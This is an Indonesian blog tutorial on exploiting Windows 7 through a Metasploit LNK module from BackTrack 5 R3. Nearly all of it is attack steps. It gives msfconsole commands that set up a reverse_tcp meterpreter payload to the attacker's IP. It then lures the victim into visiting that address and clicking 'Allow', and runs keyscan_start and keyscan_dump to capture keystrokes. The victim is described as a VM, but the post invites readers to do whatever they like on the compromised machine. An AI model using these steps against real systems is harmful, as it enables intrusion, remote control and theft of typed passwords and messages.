Exploit Windows 7 Using Modul LNK # BT5 R3

Exploit Win7 menggunakan modul LNK adalah tipe exploit menginfeksi lewat jaringan komputer via Link pada webbrowser.

Peralatan :

Attacker : Backtrack 5 R3 GNOME
Victim : Win 7 ( on VM )

Open terminal type "msfconsole"

ketik lagi " search LNK " pilih modul seperti gambar di bawah

set SRVHOST 192.168.1.1 ( your Backtrack IP )
set LHOST 192.168.1.1 ( your Backtrack IP )
set PAYLOAD windows/meterpreter/reverse_tcp

set URIPATH /
exploit

kirimkan IP backtrack (192.168.1.1) ke victim

ketika victim mengakses IP Backtrack

ketika mengakses IP Backtrack maka di browser victim akan muncul dialog box. klik "Allow"

tunggu beberapa saat, maka komputer victim akan di redirect ke shared folder backtrack

tunggu sampai ada tulisan "Meterpreter sessions 1 opened "

kalo meterpreter sudah terbuka tinggal di akses saja dengan perintah " sessions -i 1" (1 adalah nomor sessions meterpreter, menyesuaikan sessions yang terbuka )

kalau sudah terbuka kaya gini. terserah mau di apain.. :D
kalo ane sih coba pasang keylogger di meterpreter sessions
code : keyscan_start

kalo dirasa udah kenyang pake keylogger nya , langsung saja lihat hasilnya
code: "keyscan_dump"

anda bisa lihat hasil capture keylogger langusng pada terminal backtrack.

oke, sekian dulu dari saya. semoga barokah , semoga bisa menambah ilmu anda, dan semoga bermanfaat.

Mavia | Bae

Search This Blog

Exploit Windows 7 Using Modul LNK # BT5 R3

Comments